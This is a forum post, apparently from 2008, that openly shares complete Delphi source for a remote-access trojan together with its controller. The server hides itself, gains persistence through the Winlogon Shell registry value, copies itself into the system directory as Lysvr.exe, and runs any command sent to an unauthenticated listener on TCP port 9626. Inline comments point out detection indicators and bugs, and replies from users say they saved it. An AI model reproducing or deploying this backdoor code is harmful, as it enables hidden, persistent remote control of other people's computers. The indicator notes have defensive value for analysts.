delphi写匿名管道简单木马

    发表于 2008-1-30 14:21:55 | 显示全部楼层 |阅读模式
    delphi写匿名管道简单木马(转)
    ////Server.pas//////////////
    unit UtMain;

    ////////////////////////////////////
    //////////BY Smias////////////////
    ////////Email:China_Smias@Hotail.Com////
    ////////QQ:9661800////////////////
    ////////////////////////////////

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, Registry, ScktComp, StdCtrls;

    { Server-side main form. Nothing here is ever shown to the user:
      FormCreate hides the form, writes the start-up entries and activates the
      TServerSocket listener; the two socket handlers below do the rest. }
    type
    TFmMain = class(TForm)
    SS: TServerSocket;   // TCP listener; its port is fixed to 9626 in FormCreate
    Memo1: TMemo;        // scratch area that collects child-process output before it is sent back
    procedure FormCreate(Sender: TObject);
    procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
    procedure SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
    private
    { Private declarations }
    public
    { Public declarations }
    end;

    var
    FmMain: TFmMain;
    reg:TRegistry;       // global registry object; created and freed inside FormCreate only

    implementation

    {$R *.dfm}

    { FormCreate: runs once at start-up. Hides the form, sets the Winlogon
      "Shell" value so the binary is launched at logon, copies itself into the
      system directory as Lysvr.exe, then starts listening on TCP port 9626.
      Defender view: the modified Winlogon\Shell value, the dropped file name
      and the fixed listening port are all stable indicators for this sample. }
    procedure TFmMain.FormCreate(Sender: TObject);
    var
    sysdir:array[0..50] of char;  // receives the system directory (51-char buffer; 50 is passed below)
    begin
    Application.ShowMainForm:=False;
    FmMain.Left:=-200; // additionally parks the form off-screen so it stays invisible even if shown
    // Persistence: Winlogon\Shell is consulted at every interactive logon;
    // any value other than the default explorer.exe is worth alerting on.
    // NOTE(review): writing under HKLM normally needs elevated rights, and a
    // failed write raises from TRegistry — there is no try/finally, so reg
    // would not be freed on that path.
    reg:=TRegistry.Create;
    reg.RootKey:=HKEY_LOCAL_MACHINE;
    reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);  // CanCreate=true; result not checked
    if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
    reg.WriteString('Shell','Explorer.exe Lysvr.exe'); // registers the start-up entry
    reg.Free;
    // Self-copy into the system directory under a fixed name, only if absent.
    GetSystemDirectory(sysdir,50);
    if not FileExists(sysdir+'\Lysvr.exe') then
    copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);  // bFailIfExists=true

    // Unauthenticated listener; a bind failure (e.g. port already in use)
    // is swallowed silently by the empty except block.
    SS.Port:=9626;
    try
    SS.Active:=True;
    except
    end;
    end;

    { SSAccept: fired for every accepted TCP connection. Sends a fixed banner
      and performs no authentication whatsoever — any peer that can reach the
      port gets the command channel. The banner text itself is a usable
      network signature for this sample. }
    procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
    begin
    Socket.SendText('连接成功'); // "connection successful" banner, sent on every new connection
    end;

    { SSClientRead: fired when a connected client sends data. The received
      text is run verbatim as a command line in a hidden child process whose
      standard output is redirected into an anonymous pipe; the collected
      output is sent back over the same socket.
      Observations on the code as written (documented, not changed):
        - only stdout is captured: hStdInput/hStdError stay zero after FillChar;
        - fname is a 255-byte buffer and StrPCopy does not bound the copy, so a
          longer command line overruns it;
        - on the CreatePipe failure path fname/ph are not freed, and on the
          CreateProcess failure path the two pipe handles are never closed;
        - the polling loop runs on the main thread with Sleep(100), so the
          form and the socket are blocked until the child exits;
        - after the loop ph is appended to Memo1 once more, so the last chunk
          typically appears twice in the reply.
      Defender view: a hidden child process of Lysvr.exe holding an inherited
      pipe handle as stdout is the process-tree indicator for this handler. }
    procedure TFmMain.SSClientRead(Sender: TObject; Socket: TCustomWinSocket);
    var
    RemoteCmd:string;                 // command line exactly as received from the socket
    hReadPipe,hWritePipe:THandle;     // anonymous pipe; the write end becomes the child's stdout
    si:STARTUPINFO;
    lsa:SECURITY_ATTRIBUTES;          // marks the pipe handles as inheritable
    pi:PROCESS_INFORMATION;
    cchReadBuffer:DWORD;              // bytes peeked / read from the pipe
    ph:PChar;                         // 5000-byte read buffer (ReadFile asks for at most 4096)
    fname:PChar;                      // 255-byte copy of RemoteCmd handed to CreateProcess
    res:string;                       // unused
    begin
    Memo1.Clear;
    remotecmd:=Socket.ReceiveText;
    fname:=allocmem(255);
    ph:=AllocMem(5000);
    lsa.nLength :=sizeof(SECURITY_ATTRIBUTES);
    lsa.lpSecurityDescriptor :=nil;
    lsa.bInheritHandle :=True;   // needed so the child can inherit hWritePipe
    if CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false then
    begin
    socket.SendText('不能创建管道');  // "cannot create pipe"; fname and ph leak on this path
    exit;
    end;
    fillchar(si,sizeof(STARTUPINFO),0);
    si.cb:=sizeof(STARTUPINFO);
    si.dwFlags:=(STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW);
    si.wShowWindow:=SW_HIDE;     // child window hidden
    si.hStdOutput:=hWritePipe;   // only stdout is redirected; stderr is lost
    StrPCopy(fname,remotecmd);   // no length check against the 255-byte buffer
    // Run the received text as a command line. bInheritHandles=true so the
    // write end of the pipe reaches the child.
    if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
    begin
    socket.SendText('不能创建进程');  // "cannot create process"; the pipe handles are not closed here
    FreeMem(ph);
    FreeMem(fname);
    Exit;
    end;
    // Poll until the child exits: peek for pending output, read it in chunks
    // of up to 4096 bytes, and check the process state when nothing is pending.
    while(true) do
    begin
    if not PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil) then break;  // 1-byte peek only tests for data
    if cchReadBuffer<>0 then
    begin
    if ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false then break;
    ph[cchReadbuffer]:=chr(0);  // NUL-terminate the chunk before using it as a PChar
    Memo1.Lines.Add(ph);
    end
    else
    if(WaitForSingleObject(pi.hProcess ,0)=WAIT_OBJECT_0) then break;  // nothing pending and the child has exited
    Sleep(100);
    end;
    ph[cchReadBuffer]:=chr(0);   // uses whatever cchReadBuffer was left at by the loop
    Memo1.Lines.Add(ph); // collects the echo in the memo; re-adds the buffer contents left over from the loop
    CloseHandle(hReadPipe);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    CloseHandle(hWritePipe);
    FreeMem(ph);
    FreeMem(fname);
    socket.SendText(Memo1.Text); // send the collected output back to the client
    end;

    end.

    ///////////////////////////////////////////////////////////////////////////////////////////

    //////客户端/////////////////////

    unit UtMain;

    ////////////////////////////////////
    //////////BY Smias////////////////
    ////////Email:China_Smias@Hotail.Com////
    ////////QQ:9661800////////////////
    ////////////////////////////////

    interface

    uses
    Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
    Dialogs, OleCtrls, SHDocVw, StdCtrls, IdBaseComponent, IdComponent,
    IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

    { Client-side (controller) form. A plain TCP client with no protocol
      beyond raw text: Button2 connects, BitBtn2 sends the contents of Edit4,
      and whatever comes back is shown in Memo1. WebBrowser1, Label3..Label5
      and the Indy UDP units in the uses clause are declared but not used by
      any handler visible here. }
    type
    TFmMain = class(TForm)
    WebBrowser1: TWebBrowser;
    Label3: TLabel;
    Edit2: TEdit;          // target host (read in Button2Click)
    Label4: TLabel;
    Edit3: TEdit;          // target port, parsed with StrToInt in Button2Click
    Button2: TButton;      // "connect"
    CS: TClientSocket;     // the outbound TCP connection
    Edit4: TEdit;          // text sent verbatim by BitBtn2Click
    Label5: TLabel;
    Memo1: TMemo;          // displays the last reply received
    BitBtn2: TBitBtn;      // "send"
    procedure Button2Click(Sender: TObject);
    procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
    procedure BitBtn2Click(Sender: TObject);
    private
    { Private declarations }
    public
    { Public declarations }
    end;

    var
    FmMain: TFmMain;

    implementation

    {$R *.dfm}

    { Button2Click: connects CS to the host typed into Edit2 on the port typed
      into Edit3. StrToInt raises EConvertError on non-numeric input and
      CS.Open may raise on a failed connection; neither is handled here. }
    procedure TFmMain.Button2Click(Sender: TObject);
    begin
    CS.Host:=Edit2.Text;
    CS.Port:=StrToInt(Edit3.Text);
    CS.Open;
    end;

    { CSRead: fired when data arrives on CS. Replaces the memo contents with
      the received text followed by an empty line; earlier replies are
      discarded by the Clear call. }
    procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
    begin
    Memo1.Clear;
    Memo1.Lines.Add(Socket.ReceiveText);
    Memo1.Lines.Add('');
    end;

    { BitBtn2Click: sends the text in Edit4 over the open connection as-is.
      There is no check that CS is connected; presumably SendText fails or
      raises when it is not — confirm against the VCL version in use. }
    procedure TFmMain.BitBtn2Click(Sender: TObject);
    begin
    CS.Socket.SendText(edit4.Text);
    end;

    end.
    发表于 2008-2-10 02:30:55 | 显示全部楼层
    :loveliness: 保存下来
    发表于 2008-2-18 00:57:34 | 显示全部楼层
    暂时还看不懂 以后会用的/:001
    发表于 2008-4-8 13:49:40 | 显示全部楼层
    保存了
    很棒~~